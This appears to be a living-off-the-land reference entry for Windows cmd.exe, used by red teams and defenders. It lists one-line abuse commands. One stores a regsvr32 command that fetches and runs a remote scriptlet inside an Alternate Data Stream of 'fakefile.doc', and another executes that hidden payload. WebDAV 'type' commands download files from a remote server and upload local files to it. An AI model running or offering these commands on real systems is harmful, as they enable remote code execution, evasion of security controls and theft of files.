The command-line interpreter in Windows
Add content to an Alternate Data Stream (ADS).
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
Execute payload.bat stored in an Alternate Data Stream (ADS).
cmd.exe - < fakefile.doc:payload.bat
Downloads a specified file from a WebDAV server to the target file.
type \\webdav-server\folder\file.ext > C:\Path\file.ext
Uploads a specified file to a WebDAV server.
type C:\Path\file.ext > \\webdav-server\folder\file.ext